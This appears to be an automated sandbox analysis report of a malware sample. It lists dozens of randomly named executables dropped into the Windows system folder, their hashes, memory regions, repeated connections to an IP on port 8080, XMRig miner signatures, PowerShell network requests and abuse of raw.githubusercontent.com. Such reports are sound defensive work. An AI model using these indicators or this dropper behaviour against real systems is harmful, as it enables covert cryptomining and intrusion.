C:\Windows\System\CHDDNyH.exe

C:\Windows\System\CHDDNyH.exe

C:\Windows\System\jrbGTbi.exe

C:\Windows\System\jrbGTbi.exe

C:\Windows\System\VVWFcqa.exe

C:\Windows\System\VVWFcqa.exe

C:\Windows\System\ANjHJFS.exe

C:\Windows\System\ANjHJFS.exe

C:\Windows\System\UhFzGPB.exe

C:\Windows\System\UhFzGPB.exe

C:\Windows\System\duEOOPC.exe

C:\Windows\System\duEOOPC.exe

C:\Windows\System\zFPQkOe.exe

C:\Windows\System\zFPQkOe.exe

C:\Windows\System\RacxADF.exe

C:\Windows\System\RacxADF.exe

C:\Windows\System\vvooIaw.exe

C:\Windows\System\vvooIaw.exe

C:\Windows\System\JPnAEtt.exe

C:\Windows\System\JPnAEtt.exe

C:\Windows\System\HisKogp.exe

C:\Windows\System\HisKogp.exe

C:\Windows\System\xKoNJog.exe

C:\Windows\System\xKoNJog.exe

C:\Windows\System\ydHIAcV.exe

C:\Windows\System\ydHIAcV.exe

C:\Windows\System\jiKpzOQ.exe

C:\Windows\System\jiKpzOQ.exe

C:\Windows\System\BjRgyvP.exe

C:\Windows\System\BjRgyvP.exe

C:\Windows\System\KRYUaSY.exe

C:\Windows\System\KRYUaSY.exe

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp
DE 3.120.98.217:8080 tcp

Files

memory/2968-0-0x000000013FF90000-0x0000000140382000-memory.dmp

memory/2968-1-0x0000000000200000-0x0000000000210000-memory.dmp

\Windows\system\tyAOfJU.exe

MD5 b4ac9064c6ecb84969cb7cc9e92d0d47
SHA1 9bb610d52bcb4e0079c82649dec5cd4f9212b170
SHA256 83ab24f83da4fc7ee979dacebe87ddf433a3caac5fdb37f5049064d7574f392a
SHA512 8da32b668032252d2dbcfd4bcfcc4c49a578ddbf790323a20254a75b3428041c9e80e06ee7246116d309fb5da738e9ae80df23d6a98236c0c9dda45325eb01be

memory/2968-7-0x000000013F430000-0x000000013F822000-memory.dmp

\Windows\system\kcNmKkM.exe

MD5 73ed5573f0eded1f674bfd1a5215cf1c
SHA1 0e6de6da9508b4ff8c1761dd2fc83da234a16f5b
SHA256 208c70acc217bb90e6e0d497686db7a227d4c418e25d5814df3bb6b35f325e6d
SHA512 5a6d7a4fd4234d0bfbc130b0b63628ceccfcde184dee668327bd0b198082236f525bedc292e0d48831b7de7081decae987cf0facad96461529884d23e0bf31b2

memory/2144-16-0x000000013F430000-0x000000013F822000-memory.dmp

memory/3044-25-0x000007FEF616E000-0x000007FEF616F000-memory.dmp

\Windows\system\mdDwtNI.exe

MD5 98ac3eed0a316fac2a8e80a9d3709f7b
SHA1 5c5f78ade9baa81904029dbdf6a19ef0cc28ef8e
SHA256 9617c37cf0d4e2327aa3fca2a1fd86e7bd5db02ae6b7e5b8778cce8937a174df
SHA512 c2fa37875846ca73282a166f683700230181c7eacb9f422603b7a6b6f83b97be6d5a395b2834832c443b4d0d71ca68c897d46b15d7cccec5b7adb746be6186c1

memory/2968-24-0x000000013F260000-0x000000013F652000-memory.dmp

C:\Windows\system\NCbSbWH.exe

MD5 42c087b7b40eb6ebf5186ab31215810d
SHA1 27e51d9b96e25f8ec17a9bd2ed57cf3510e513d7
SHA256 2ab6fefb469a7e8d5c8443e410768206838f11cbd61a0d9c6ea6d8261d18ac3c
SHA512 08473959a4316d628f46fa4b3d77e1a64e01a0bbf6649e9c8907d7b2ee1b243c09ee9c638dcca8f776a3f69f7955e6c759e3d8d59ce78d0e54cee7a49f41553b

memory/3044-27-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

\Windows\system\QNkapwI.exe

MD5 5c81fd012fda9dd380fc3449b87b0a1f
SHA1 bf338221014b163292ab5f927b1f6ff2aca67b93
SHA256 a22f421508a95ce8494ea81392238f4ed53d0b513bcb514e17bfc33dcef4f4f1
SHA512 71c61c85e9bf0f851eb98b8910417d362b97cc68bbad6a4bab7b4a8e66daa3fe41295b450b0cda4090f16136857e151b6687362d82de0226dc957a493fca0661

\Windows\system\wbrEZEN.exe

MD5 80dc8c5cc152a469f214afb070c05f7f
SHA1 cf4325bb775e8186897c28a3ec5f1f6da8f98db9
SHA256 20c7972d87ef82ef0346c17e308308e4bc4a7487123a323bd6608bb46349027b
SHA512 e81eb024a4cedbb3d709a0432e3362251e351416d9cfadeb9afa1a00b6d3066f01e14cebddb39c6415738e40a850591989104b7b14a9318b14f081dda8a0f9b8

memory/3044-74-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2968-75-0x000000013F3F0000-0x000000013F7E2000-memory.dmp

memory/2968-76-0x0000000003610000-0x0000000003A02000-memory.dmp

memory/2360-77-0x000000013F720000-0x000000013FB12000-memory.dmp

memory/2968-79-0x000000013F530000-0x000000013F922000-memory.dmp

C:\Windows\system\lKcbNQa.exe

MD5 3fff82710d52a554685d09d658deb141
SHA1 ad927c1a3f0a9d854ace0bf8722c14aade740030
SHA256 ae8edf501eae5dee563ccf11bc5e3e10038f5701452cb1ad2cef91cfe2fe9038
SHA512 2f82d5341ddb43342d4a3db3b61d895bf0950978b5afa0bab39c7d105d044ee027b29bb55697494b57dd70461876192fb2eb9bf6fae6a232d5c77cd9037b7250

C:\Windows\system\FJDJVkc.exe

MD5 a44035bfceadb91c8d47bdab5a21325c
SHA1 5bf18a34dc48d503da9b11ed8fe12505b0e4b497
SHA256 699780982070a696881f13a55dcb2fb1712d16f0873db58889ed2b8ef3c890c5
SHA512 632dea5019063d02eaf9982f1538c1d0eae0e4d51cefde06337888a4b2929c033e9cf7b7ad786bdbafccc1e311a8fb704c5129fb00f541d250c8497d7e3d1924

\Windows\system\jMzNhmV.exe

MD5 9efbe326c45668c2b3092a67665e59eb
SHA1 2bee60baeddd83410a37e3630d66b50231ef827a
SHA256 fa1b0dbaff60b97178bdf8f8e72c552cb9f6cf35275b890b49783aceb344123f
SHA512 a26eeb448809dfc9669240980c118e100386608b6e044d0157a2bea6c0bf93e795706761450efb2297da0b792f9404837759b17e98309255cbf8355e712b0cf9

memory/2688-95-0x000000013F3F0000-0x000000013F7E2000-memory.dmp

memory/2748-97-0x000000013F260000-0x000000013F652000-memory.dmp

memory/2968-98-0x000000013F720000-0x000000013FB12000-memory.dmp

memory/2640-101-0x000000013F970000-0x000000013FD62000-memory.dmp

C:\Windows\system\ddPkPXd.exe

MD5 6864f7e2eedf3b89281530f3fd2a9c21
SHA1 c0ca8738ef867c151ec32e823f0f60666f414e1a
SHA256 c936beb620b6ab00c7ecb3bdc8d5751f5d3282f43e6c85882f1621520f13bee7
SHA512 77a700824b708117dee9f261d136d86714d5089502aabebdfdf5cdaa94e5d7c97cab73c6eecfe525d7dd250a30d502b879c3e0ec96055bfd399f0aab834efb7e

\Windows\system\LjQLVpW.exe

MD5 87fa2557afe1b02799533350f35a86e9
SHA1 732fb77c46b1fdd4e5a8183c0d56854f7ec8736a
SHA256 31ff7a3c21da1b5ab8e3d57102f99a1014a5cb568c8fb04e92abbbaa2737d70c
SHA512 4fa4c52347f39b331cce14914331b7d7fb0b9f23e1f5f1598c567777fa58c8fd8c2d841dac3128d90497869be1fe82c75bb66f8d9b7906103579cfaea27515f0

C:\Windows\system\wnRKIeL.exe

MD5 7bf177f6b7b99a706fc686b00de6d369
SHA1 8ae0d75075ea2363e8745100fc3f47dd009200d0
SHA256 fcc339894069e7c52d2429bb2bfe251a047c85ae1cdf8fb6798651366c561ac7
SHA512 069f9219dfaf32cb429aecdc610327fb7c1d2f2160094dafcf10ef7765ef0f588dbbce4bf8fef010b4c058c2d2f1d647839d846cf879be108907b26a247a1358

\Windows\system\ObEoxgx.exe

MD5 144e3d34f52ff2fe350406e7f629c223
SHA1 42516db39a746a5e3873afa319b5e8b6442bda70
SHA256 9db91c78a0e907f928cf993823b5588071bc11638670aa5628c04d6b827403a0
SHA512 298b65689164cb4ecb9cde1ca71a32344892448aadf7205ac14e8681bfd1603daf9c69051cb66fccf5f6a7891fab5b790fd5cdd7a88600d5637b007fffbc6276

\Windows\system\mtEsqxp.exe

MD5 b42769a7443252ff71d92c490f7536db
SHA1 ac62f7de50cc9820bf775041e7e695e3ea56ae90
SHA256 a71fdf69d4e70c9f0eb4ca126ccae19b0a69ecc60543cb6dbdfad652b44a0e81
SHA512 3145cc1c7d0e9a0b08ccdfc3f72304a41e3d386806fb94b972ec9a97eebbe3239e17eb91a1ca5e171c44a1748cee5fd4f9517d2f145910c0fa9a52f9a1eaef31

C:\Windows\system\tAXNxnT.exe

MD5 96bade3bef99cff1a1e7ef30dc7a98f6
SHA1 c1c97ef41d09ea51bf0d0aea2cf70734b45fdf77
SHA256 84c1c216415acd9cc55cbb791e18694a49e358c78c865ccc1caab82df8f57862
SHA512 63972942ec0b4418e57a8dd6f2385aec43d7793c849b5aa8efe20264dd97a559a3dbd1c76b3b5c9aae4958864f4619e0e2447f6397528896426b764c2064a2d0

\Windows\system\gUoCAPe.exe

MD5 ede771783fee20352a1d8a5f8ebfa820
SHA1 fa1334c28636a74a8e604ad9fba420337d226e0a
SHA256 5ba7cfb24f5955dbb47c0ff2b5313a98d3e1a452854d2d81d4597327419950f2
SHA512 f67ba3182abcca4841096037118e395e28bebcc3d9ccc4799ae12c0582265849ef7dc7671a64a9cc9f15ee4bfe9fe2460d8fdb5ed254936e943ed98009775eaa

\Windows\system\ewaUDtm.exe

MD5 093115a74ba5f841e5fbc42c55c3f4bb
SHA1 d9e94072ae4b35eff89d3b924929dd987880f0fb
SHA256 0360dce7e95ebe88e2c946df557c868867467251d2f0df60b89200034af7d55e
SHA512 b7c16c163fbae18cae6878cdc672dfe7e3ecf26adef225dab151b551ce69fb16fd6665276d4b6b85c91dcced1318a7c07aeb264add205fa20cceb8cbea7680af

\Windows\system\iHelium.exe

MD5 b5489137ad9acf000618ba7aac6e1f54
SHA1 67c815021f9af4d54f6784c91206970b13c48c34
SHA256 65396f476751062824e68887ef284056363a2116ac3a352006f0a56ed0ca6309
SHA512 c668dd2d5a67bdc39f02a0b856034eb447e45d681a8ea42af880269e1fb7d37c7370ffef290c74e718ef43008333fbd616af962a95fcf39ecbcb7a4d96417c5e

C:\Windows\system\JdFxsvL.exe

MD5 7f72b4904f628380db5a9cd08cf097ad
SHA1 295ff19c811413c610008d0e45cf0aadcc52d54f
SHA256 2e31339739d2c49429bf213ebd50b0f8407c8b2ca10f229dad070cc034e9c4d5
SHA512 dfd8d6167719cbadebab4492365883d61f722619f51ed0c1c2436b62293748af9945d6af9e1e1777aec0d5b8682cca4bb155b353304d31fe242fff9eb00d0596

\Windows\system\gwgVavP.exe

MD5 cb30663b1338111e92570d8fa2661f76
SHA1 233b7d986c2e2b69d0833bac3cc07456343d5759
SHA256 c5f2db3a3c4000edd84e63a0d6d29871333d15580b0f4c9f6fe700c64127961c
SHA512 1e69d344d61517cfae292d81fd6be31566f6538014b6ad78fa37adbf59c52a1a4739ca27f5098b693aeb9084e4d4f019ecc500aa59cf682dff58677968d3fc95

\Windows\system\rSvNZgZ.exe

MD5 492754bde140b162ab319c1b2bb2defc
SHA1 8711de64de7b809def30492ceaf52511fff5bfcd
SHA256 22d6a38bd21b2d5ea4646a14b6938992f42405f5c3ab57bfbc54781c40c1b4d6
SHA512 1820c0575dc9d5bcb165f8ba81fb17c9a356dd1beede6e154b7ac9c13383315025bcce36551245c140c390117c056f839139cd1ffa1ea26444c9ae4db0e38e00

\Windows\system\OkjMtAr.exe

MD5 a234ffb2787ea68cee13718cf0303df7
SHA1 6a7d6a9439ed7a9521a98c4977eb66b456561f44
SHA256 e8b59feadc196a37efe897fe0354c8552df91f40597c3841dd772e34ea23b375
SHA512 341c67cb0cfeee5c811efedd5fdbee1a8a87cc6d00a29288b7b61140133242820244f8dd4b101517367fa0f7a63019d8227261a359ca417df89c88d931980215

\Windows\system\WwMUtII.exe

MD5 41a8af77dafa52d746cc348d5b09b1ae
SHA1 29bab6848a13aa220f7ef0bedcbd02f74acdd635
SHA256 1b2076d246cee13e64e25f6c6a86d87b9309e13a9a3ec95f93f2331637fb7627
SHA512 65ae6431eebaa16ed54561f3fff39ca862fb850572fa436990c31a80007f2636000464759d4ab16163333061555dfc31cbe5ec7c777a2b3fb5b81d2a108e3072

\Windows\system\isbRxtN.exe

MD5 56c9b586fbe6d28242ba0a010231e5d9
SHA1 b8ef52a0d235f6d015d927ee3cbbb29891922d1b
SHA256 e75a2bc289b2996f448c410d23b78fc3cf8f055569c5eaddff09ed0ddcc286ac
SHA512 41c69d86de0d23b8a775f8385856d6a87b5b8b630f269eba2fcbd24244da0c14941792fdf3633f3ae33399b574ddc7fe80a29b3f641c9a37c11f7daef67fec2a

C:\Windows\system\MRZBMyW.exe

MD5 73209fa886692364452f184303d93838
SHA1 fd41ac91946a21eda6b033115d36e17d4d52550b
SHA256 e70ac9ce72bc0466180c46197c3e933cea6bb4a4783a9bc31dff99204b723dda
SHA512 ab823f15c3a1aee13c5fc97e56afb2fd67e78cf466146eed7e19b710387d15e55e88527812aa22b8bd0346319f6a022c48dfbd456de5b6842b85ad098aba78f4

\Windows\system\Ctkzsqx.exe

MD5 9225edb44864259b568d47ef5cd54cd7
SHA1 13e34a99c6c8c64801ce64bbabf8266450687127
SHA256 55e4aedef529aad04d915fdc87757c188792352297927e09c3032abf5750e2e1
SHA512 34162efebbae79ca3c2c087cb174d1a40d129ebaea3ce60dddcf92d5d9130ab15a940ff3cd272331626eede4d9fa716fc07ab4d8f69a6add88193cfa8787a121

C:\Windows\system\tJgrxBW.exe

MD5 ae7b7d53125980998a3a48752256249c
SHA1 a8b6eabb09d946f2db9a3bbf3dc8eb586e0d642f
SHA256 be77c4091d41846e863ba3be9f39f657e9691a658d153bfb10bf587cf0304311
SHA512 49ebcfc85c17c7054fbec4be7f4c8939580756c6f7eafe3f2f5928f35ce1a631aa23e3b926f39ff2f3e9526b28489bf8bb4d723236fae27c9b18b87325d78f92

memory/2544-110-0x000000013F530000-0x000000013F922000-memory.dmp

\Windows\system\OixsoQP.exe

MD5 e2e98e8fd23e8a38ae95c349b6b7b5c3
SHA1 9db1a14a8b02b49bed07c9aec343062c1735aec9
SHA256 4da674b4205f097c717ac3524f1a6a28808bb333463cbe00ee3cce819387abde
SHA512 7885d8414c1269c663f44e0d9c43ca605521248a65286c5992041aba924c8be54641649e68d3eebaf0beca89a6e378d9fcba382f82ac9b5acc9a002dfedb61e1

\Windows\system\qlyRWQx.exe

MD5 4da0bcf6c21532d1ceada1205ca6c4ff
SHA1 0e29e95c3e71fb9ca597baa72c035a8441291879
SHA256 bace3da3ee406bc1e5312fad2b9866302d8cc02737d1c5c8d400986e831a9792
SHA512 3ada7fcf617ae2cc4d37cc470f8f0bcb22bd8d608cd0e6372c6a1dcd752976ed3650c3064f0c33876c0c2318f72190045d056de01499675533dfde821567f859

memory/2188-89-0x000000013FAD0000-0x000000013FEC2000-memory.dmp

memory/2968-88-0x0000000003610000-0x0000000003A02000-memory.dmp

memory/2968-87-0x000000013F0D0000-0x000000013F4C2000-memory.dmp

memory/2968-86-0x000000013FAD0000-0x000000013FEC2000-memory.dmp

memory/2968-85-0x0000000003610000-0x0000000003A02000-memory.dmp

memory/2968-84-0x000000013F970000-0x000000013FD62000-memory.dmp

memory/2756-83-0x000000013FE20000-0x0000000140212000-memory.dmp

\Windows\system\PqIkVEO.exe

MD5 fe8159e267e872dfae4c9be8cad1ab58
SHA1 34a89c0910fe294b3a3000da292e1a6c50881762
SHA256 5f1b28625de6b28564563d55465da62f40aaa1d0e43b068332deb901021156b3
SHA512 80ca0a12597fa72d9f1db884ee928ebeef1b8fe8a1747833c3af39ffe7400473ab369ba5b5b5bb6420d85ba17b57e36610fc605cca0727f88b062ef5b626ac63

\Windows\system\VbfeQnY.exe

MD5 56ee5320ebbc402a80fe2531a40d856b
SHA1 90878707385444a5309a587ecbfaa7cd80dfba2c
SHA256 32909fd4d8d6686d7ebe78450bc5bb96256d60fbe78ef5399d4cb4968856581b
SHA512 92a0d5ac628662b28661a64677c2b2a187ca61df7c1b00a8523b778a395dc23a011e200ec2e341edc364f43526f116c59a4b0d947ab69b69108b34bf22aeae2f

\Windows\system\plHvLvc.exe

MD5 aa25cfab36f10317ef78f5a0b29deb7e
SHA1 301bedc6cc012c4ce75761b0f8eefcc781aee486
SHA256 0c6a259ddefc29d82001b6c515a1eb962e551b973dc3c38bb9f5d48ea738a1a4
SHA512 6db603f271aa353cdccfb1d5cd10ca2e3184fb5a958be56104ec9ab3ab72c4ed833ceebceb0ac07291d44e7221e5c9977a4925dbf5bd9e5ef42b7a2ffab27cea

C:\Windows\system\BaLrkTI.exe

MD5 fa5da3146bbbfad087031949f87f4805
SHA1 9b642d9a3cbed5549c99eae51e40b9f5a8c7d747
SHA256 690607c12acc6df7bc3b07cfef60995605495619a6a3a0c48a0c4b8cef0f8700
SHA512 724240cae17b0438b9d4105dcf6401fd0e03b4cc2ada955f450ef558e7ad977e9c9f9884f70024249b3c5f0e2ee86375ab5cf27522ffd5ee3d00a12806a953ab

C:\Windows\system\VDsHovw.exe

MD5 c15b4e8b5ef356fda64c76801cd75d35
SHA1 153b69fabef87f133ce4e02d763ea749421660ff
SHA256 687d7b27705e8a5a1dc9935b8b3837a84566ff86ce5c27298645b8fb6deaa896
SHA512 db471bc50a5bb01279f44132381fa6568a2e3408d3f24e3fa6508919b05d5a39557f659b935d56b84238815c43f18559c2df6b0207af024c553741d03d55b240

C:\Windows\system\JSRSNml.exe

MD5 9c88fe12bba13d3fd5b633f72fdb65ba
SHA1 f2f43adcd470793c7664b6f91cc201e2331eff5c
SHA256 9fbc503dc94e6830c2dcedb83ce18d79389a7af2ad66e352da5c81e332d612fe
SHA512 99d5814b0162b2614869d62f64a6827834f9881f562798a45901e003e5b2ba56c3b89913e2fefd1897e39a69e1fc94140cf898d58e6407930b20cc5423e3427f

C:\Windows\system\MXTqVsc.exe

MD5 9c838c3b8a3361ee896dd16800905850
SHA1 c4ce58442889c36a3bcf981b5ba95fde9c9a01f4
SHA256 ae9cdac04246abbf9adb5e4637c583371f28cd2904a94bb67b2b1ba8824d806a
SHA512 e1392e01b83f0d2cbeb8063587e87cf5c82448b82efdd4306a827026a3ed35afe82ee20297ccec5cab4135d9c22de2daca014827e8eef053c98b1ef027794d39

C:\Windows\system\nkRAjCm.exe

MD5 73d027735b4789ef8bdf95e0cdf21e1f
SHA1 2a4be4a57b0ccbb3f47c5d6de99c85a3a39b9fe2
SHA256 4a4de5c39e0e10a8006d74d28d4ff7a33711f94a49bfb6bedd019843d665f4d8
SHA512 b535369af6a9d40ab200df5f67939e29f97a5c9a557f1460b5433c8630ca2662b04bd056fb26655555c2f5fb657e13e22fd7e106c2483cf73287bb8614c3854f

C:\Windows\system\BonoMfd.exe

MD5 504cfe7f2caf024e5de1e65ebe480d34
SHA1 84639504c54c03f158a1eb82f8c1351357cff00b
SHA256 dbf62ead58388d01e8dd93c49ca76a8f389fc245cf3bd2a0c32d26cdb2827ef2
SHA512 594b4b177dc5a5ebbfad09ca88bd0a8e791127c4b941cd7f1092912508ea85b9c2685079d3da99bbe33d42050aa8b036999cc24fcd71702656fc6054225ce2c9

C:\Windows\system\AWKPgNc.exe

MD5 8d9e9e749c2a67520029701dc75b937e
SHA1 0238b3bb19e3e77fbfb1fa77b98181ed448f0d9c
SHA256 02e0570244e223c784ba52648704987515b1a71f9a03cf91574e13cbf3e73a6f
SHA512 f5a37de922da345503aee2cb7c76e714cf5651ff1d694369d853d67218a8f9f4ae24927d192f091c8dadda1b4f6d688f6ef0e624a75b5302c0f1f65f28e89020

memory/2164-100-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2968-99-0x0000000003610000-0x0000000003A02000-memory.dmp

memory/2968-96-0x000000013F2A0000-0x000000013F692000-memory.dmp

memory/1312-93-0x000000013FBA0000-0x000000013FF92000-memory.dmp

C:\Windows\system\gXrcmas.exe

MD5 78dea99cee86934acfc3d355ef9942dd
SHA1 3b60ac2715050c95d26bea9bad6164a38002aa70
SHA256 ae01397b8db179fe6b476bb5e259b8aefdc8c2e0ebd0c33035f945f8297f375b
SHA512 8cb4aeb2cd9188aeeb496c0aec1e08a4be4b5c6d1e78520e5134e11136b47a02ff5f06df5604a6310527543de0f9b92c1adb29d5428d401812a7f5b798981f3e

memory/3044-33-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2660-32-0x000000013F2A0000-0x000000013F692000-memory.dmp

memory/3044-31-0x0000000002960000-0x0000000002968000-memory.dmp

memory/3044-30-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/3044-572-0x000007FEF5EB0000-0x000007FEF684D000-memory.dmp

memory/2144-5180-0x000000013F430000-0x000000013F822000-memory.dmp

memory/2660-5193-0x000000013F2A0000-0x000000013F692000-memory.dmp

memory/2164-5213-0x000000013FBD0000-0x000000013FFC2000-memory.dmp

memory/2188-5242-0x000000013FAD0000-0x000000013FEC2000-memory.dmp

memory/2688-5247-0x000000013F3F0000-0x000000013F7E2000-memory.dmp

memory/2360-5245-0x000000013F720000-0x000000013FB12000-memory.dmp

memory/1312-5241-0x000000013FBA0000-0x000000013FF92000-memory.dmp

memory/2756-5240-0x000000013FE20000-0x0000000140212000-memory.dmp

memory/2640-5235-0x000000013F970000-0x000000013FD62000-memory.dmp

memory/2748-5192-0x000000013F260000-0x000000013F652000-memory.dmp

memory/2544-6005-0x000000013F530000-0x000000013F922000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-22 21:01

Reported

2024-05-22 21:03

Platform

win10v2004-20240426-en

Max time kernel

139s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\JonCuBu.exe N/A
N/A N/A C:\Windows\System\kEdJmrz.exe N/A
N/A N/A C:\Windows\System\xqSyGQj.exe N/A
N/A N/A C:\Windows\System\KtqLifu.exe N/A
N/A N/A C:\Windows\System\LDRXizl.exe N/A
N/A N/A C:\Windows\System\LoHxNOo.exe N/A
N/A N/A C:\Windows\System\NuFbkdj.exe N/A
N/A N/A C:\Windows\System\FEmsBsL.exe N/A
N/A N/A C:\Windows\System\ZDsCOXL.exe N/A
N/A N/A C:\Windows\System\ynpOljO.exe N/A
N/A N/A C:\Windows\System\EhfFOdg.exe N/A
N/A N/A C:\Windows\System\RrSttqY.exe N/A
N/A N/A C:\Windows\System\wLWpVln.exe N/A
N/A N/A C:\Windows\System\yFtinJH.exe N/A
N/A N/A C:\Windows\System\qFChzUW.exe N/A
N/A N/A C:\Windows\System\VxLvzkE.exe N/A
N/A N/A C:\Windows\System\dKpzFBd.exe N/A
N/A N/A C:\Windows\System\VWjOqgN.exe N/A
N/A N/A C:\Windows\System\YpBmLIs.exe N/A
N/A N/A C:\Windows\System\CKFXics.exe N/A
N/A N/A C:\Windows\System\AKydYsX.exe N/A
N/A N/A C:\Windows\System\qReMRCd.exe N/A
N/A N/A C:\Windows\System\qfMDkGq.exe N/A
N/A N/A C:\Windows\System\JTgpNHz.exe N/A
N/A N/A C:\Windows\System\sMsCQDI.exe N/A
N/A N/A C:\Windows\System\zqniLXE.exe N/A
N/A N/A C:\Windows\System\PtbeSAq.exe N/A
N/A N/A C:\Windows\System\vdmURMq.exe N/A
N/A N/A C:\Windows\System\qKvowYU.exe N/A
N/A N/A C:\Windows\System\NGlyvnw.exe N/A
N/A N/A C:\Windows\System\ClSTZIj.exe N/A
N/A N/A C:\Windows\System\TjTKNNk.exe N/A
N/A N/A C:\Windows\System\HvwWRBQ.exe N/A
N/A N/A C:\Windows\System\bqaMhPx.exe N/A
N/A N/A C:\Windows\System\QEqIusX.exe N/A
N/A N/A C:\Windows\System\feiuYiY.exe N/A
N/A N/A C:\Windows\System\FqqPbad.exe N/A
N/A N/A C:\Windows\System\WOUiFMI.exe N/A
N/A N/A C:\Windows\System\VmVWIgJ.exe N/A
N/A N/A C:\Windows\System\YeRuNYA.exe N/A
N/A N/A C:\Windows\System\dWRgnLQ.exe N/A
N/A N/A C:\Windows\System\qrOZrGe.exe N/A
N/A N/A C:\Windows\System\RLuIGQY.exe N/A
N/A N/A C:\Windows\System\yCvZUcT.exe N/A
N/A N/A C:\Windows\System\JTzipdv.exe N/A
N/A N/A C:\Windows\System\vlYVSKV.exe N/A
N/A N/A C:\Windows\System\UjFmbBi.exe N/A
N/A N/A C:\Windows\System\tITsiay.exe N/A
N/A N/A C:\Windows\System\EXFVTbL.exe N/A
N/A N/A C:\Windows\System\FQCWSWz.exe N/A
N/A N/A C:\Windows\System\NYOgzEc.exe N/A
N/A N/A C:\Windows\System\cNpOHuL.exe N/A
N/A N/A C:\Windows\System\xjVITeR.exe N/A
N/A N/A C:\Windows\System\xwTUvaW.exe N/A
N/A N/A C:\Windows\System\sRbYeJk.exe N/A
N/A N/A C:\Windows\System\jYsXcYH.exe N/A
N/A N/A C:\Windows\System\LBBmCUy.exe N/A
N/A N/A C:\Windows\System\GVISYya.exe N/A
N/A N/A C:\Windows\System\HALLYrl.exe N/A
N/A N/A C:\Windows\System\qgwgpLg.exe N/A
N/A N/A C:\Windows\System\qdoZNEl.exe N/A
N/A N/A C:\Windows\System\NktYoMl.exe N/A
N/A N/A C:\Windows\System\vdAqlbE.exe N/A
N/A N/A C:\Windows\System\VaEetJH.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\NMVWQUZ.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZSEcLgf.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\pkUUabz.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EstZjXE.exe C:\Users\Admin\AppData\Local\Temp\3a74c413cf24bab40f56fe140bd9dbe0_NeikiAnalytics.exe N/A
